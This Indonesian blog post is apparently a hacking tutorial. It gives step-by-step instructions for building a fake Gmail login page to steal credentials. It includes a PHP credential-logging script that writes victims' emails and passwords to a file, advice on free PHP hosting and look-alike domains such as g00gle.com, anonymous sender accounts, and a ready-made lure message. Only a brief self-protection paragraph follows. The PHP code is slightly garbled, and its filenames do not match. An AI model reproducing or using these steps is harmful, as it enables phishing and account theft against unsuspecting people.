Apa Itu Pishing
Pishing adalah tindakan untuk memperoleh informasi seperti username / email, password, rincian kartu kredit (dan kadang-kadang, secara tidak langsung, uang) dengan menyamar sebagai entitas yang dapat dipercaya dalam komunikasi elektronik.
Komunikasi yang dimaksudkan berasal dari situs web sosial populer, situs lelang, pengolah pembayaran online atau administrator TI biasanya digunakan untuk menarik publik yang tidak menaruh curiga. Email pishing mungkin berisi tautan ke situs web yang terinfeksi malware dll. Pishing biasanya dilakukan melalui spoofing email atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan detail di situs web palsu yang tampilan dan nuansanya hampir sama dengan yang sah.
Cara Kerja Pishing
Tutorial ini akan menjelaskan cara membuat halaman login palsu untuk Pishing, dalam hal ini kita akan pergi dengan Gmail sebagai contoh. Prosedur ini bisa digunakan untuk membuat halaman palsu untuk website lain dengan cara yang sama. Yahoo !, Facebook, Myspace - Situs manapun yang sobat inginkan bisa dibuat dengan menggunakan tutorial ini.
1. Pergi ke situs gmail.com. Klik kanan di manapun dan Save the Page sebagai file HTML.
2. Setelah sobat menyimpan halaman login Gmail sepenuhnya, sobat akan melihat file HTML dan folder dengan nama sesuatu seperti Email dari file google. Ada dua file gambar yaitu "google_transparent.gif" dan "mail.logo.png" tanpa tanda kutip.
3. Sekarang kita perlu mengupload gambar-gambar ini ke situs web hosting gambar online seperti
Tinypic.com
Postimage.com
Photobucket.com
Setelah mengunggah, buka gambar tempat sobat menguploadnya dan salin URL (link) masing-masing gambar.
4. Buka file HTML di editor teks seperti NotePad dan MsWord (saya rekomendasiin NotePad, karena gampang digunakan dan tidak berat). (sobat bisa menggunakan CTRL + F untuk hal berikut) - Cari "google_transparent.gif" (tanpa tanda kutip) dan ganti dengan URL yang sesuai. Cari "mail.logo.png" (tanpa tanda kutip) dan ganti dengan URL yang sesuai.
5. Dalam file yang sama, cari:
action='https: //www.google.com/accounts/ServiceLoginAuth',
dan ganti dengan
action='http: // situsanda.com/login.php'
(tanpa tanda kutip dan sobat harus menulis URL situs palsu sobat di sana, lihat langkah 7 untuk membuatnya).Sekarang, simpan filenya dengan nama index.html
6. Sekarang sobat perlu membuat file PHP yang disebut "login.php". Jadi buka text editor (seperti NotePad) dan ketik berikut (sobat bisa langsung copas aja):
<? Php $ handle = fopen ("password.txt", "a");
fwrite ($handle,$_POST ["Email"]);
fwrite ($handle,"\n");
fwrite ($handle,$_POST ["Passwd"]);
fwrite ($handle,"\n");
fwrite ($handle,"\n");
fclose ($handle) ;
header("Location:https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>
Sekarang simpan filenya dengan nama "login.php (tanpa tanda kutip tentunya).
7. Buka NotePad lagi dan langsung saja simpan filenya dengan nama "passwd.txt" tanpa konten apapun (file kosong).
Sekarang upload ketiga file tersebut yaitu (index.html, login.php, passwd.txt) di subdomain Web Hosting Site manapun. (Catatan: bahwa Situs Web Hosting harus memiliki fitur php). Sobat bisa menggunakan situs berikut:
110mb.com
Spam.com
Justfree.com
007sites.com
(Atau sobat bisa ngegoogle, banyak banget disana)
Ikuti petunjuk di Situs Web Hosting dan siapkan halaman login palsu sobat. Pastikan sobat memberi nama URL itu seperti g00gle.com atau apapun yang menurut sobat paling tidak mencurigakan. (Pastikan URL tidak menonjol di address bar karena bisa mengingatkan korban).
8. Buat akun email palsu, jika sobat lebih suka mengirim link halaman pishing secara anonim.
9. Dan sekarang yang harus sobat lakukan adalah mengirim sesuatu seperti "Gmail memulai fitur baru: Untuk menggunakan layanan ini, masuk ke halaman ini", bersama dengan ini kirim link ke situs web palsu sobat.
Catatan: Agar pengguna meyakini perubahan URL halaman web domain pishing sobat, gunakan situs URL singkat gratis seperti: co.nr, co.cc, cz.cc ini akan membuat pengguna meyakini bahwa itu adalah URL yang benar. (Tapi nggak diganti juga nggak apa apa sih).
Melindungi Diri Sendiri
Pishing halaman web dimaksudkan untuk menipu korban agar berpikir bahwa situs web yang mereka masuki itu asli padahal sebenarnya situs web benar-benar berbeda. Satu-satunya cara pasti untuk melindungi diri dari menjadi korban adalah selalu memastikan bahwa situs web yang sobat berikan kepada akun dan kata sandi sobat untuk menjadi bonafide dengan hanya mengintip bilah alamat di browser web sobat. Selain itu, hindari mengikuti tautan dari situs web yang cerdik, email penipuan atau bahkan bagian komentar di berbagai tempat. Semua orang bersalah sampai tidak bersalah. Asumsikan permusuhan atau menerima kerentanan.
EDIT: Metode ini saat ini tidak bekerja. File yang kami upload ke situs web hosting mana yang sama seperti yang disebutkan di sini, sampai sekarang, bagaimanapun, file-file ini tidak dapat ditemukan. Untuk beberapa alasan, tim Gmail tampaknya memodifikasi dan mengubah log in page hampir setiap minggu sehingga metode pishing menjadi sedikit berbeda setiap saat.
Sekian dari saya. Salam Hax
Kunjungi juga website saya >>
http://cuplistech.blogspot.com/
0 Komentar